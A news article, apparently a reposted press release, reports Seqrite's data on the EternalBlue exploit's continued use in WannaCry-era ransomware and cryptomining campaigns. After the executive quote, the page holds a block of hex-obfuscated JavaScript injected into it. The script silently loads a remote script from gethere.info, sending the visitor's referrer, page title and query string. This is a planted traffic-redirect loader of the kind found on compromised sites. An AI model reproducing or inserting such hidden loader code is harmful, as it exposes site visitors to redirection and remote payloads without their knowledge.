a�?EternalBluea�� continues to be a popular threat actor among cybercriminals in 2018: Seqrite

a�?EternalBlue a�� A Popular Threat Actor of 2017-2018a��, Seqrite, one of the leading providers of enterprise security solutions, today revealed that it has detected more than 18 million hits of the exploit in advanced cyberattacks like ransomware and distributed cryptomining campaigns. Almost a year after the infamous WannaCry ransomware attack, leaked NSA Exploit a�?EternalBluea�� continues to be a popular threat actor for cybercriminals to infiltrate into systems and make financial gains. The report highlights data sourced from Quick Heal Security Labs and gives insights into the exploita��s timeline, analysis and recent observations made around its existence till date

a�?EternalBluea�� is the deadliest exploit leaked by hacking group known as Shadow Brokers in April last year. Seqrite observed the first impression of EternalBlue in May 2017 with the outbreak of WannaCry ransomware. The detection count gradually started increasing as WannaCry started spreading to other systems making it the biggest ransomware attack in history that affected more than 150 countries. After the success of WannaCry, several new Proof of Concept or POC exploit were discovered on the internet for a�?EternalBlue. With this easy availability of a�?EternalBluea��, hackers were observed using the exploit in the ensuing attacks like EternalRocks worm, Petya a.k.a NotPetya ransomware and BadRabbit Ransomware.

Following a detailed investigation, Seqrite further discovered that a�?EternalBluea�� which was mostly utilized in ransomware attacks is now also being increasingly deployed by hackers to distribute cryptomining campaigns like Adylkuzz, Zealot and WannaMine. According to the report, there has been a healthy increase in detection statistics from December with March recording the highest detection count of over 70 lakh hits. This is largely due to the rapid rise in the valuation of cryptocurrencies and the fact that cryptomining allows attackers to illegally and discreetly mine cryptocurrencies on infected endpoints.

Sanjay Katkar, Joint Managing Director and Chief Technology Officer, Quick Heal Technologies Limited, a�?Exploits leaked by Shadowbrokers especially EternalBlue have helped hackers to launch some of the biggest cyberattacks in the form of WannaCry, Petya a.k.a. NotPetya and BadRabbit. While hackers using EternalBlue to launch ransomware attacks is widely known, it is interesting to note that cybercriminals are now leveraging this tool to distribute cryptomining campaigns. What is worrisome is that a large number of endpoints continue to be unprotected and vulnerabilities remain unpatched. Ita��s about time we realize that prevention is an important remedy that can help businesses to stay a step ahead of the attackers.a�?

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Leave a Reply

Your email address will not be published. Required fields are marked *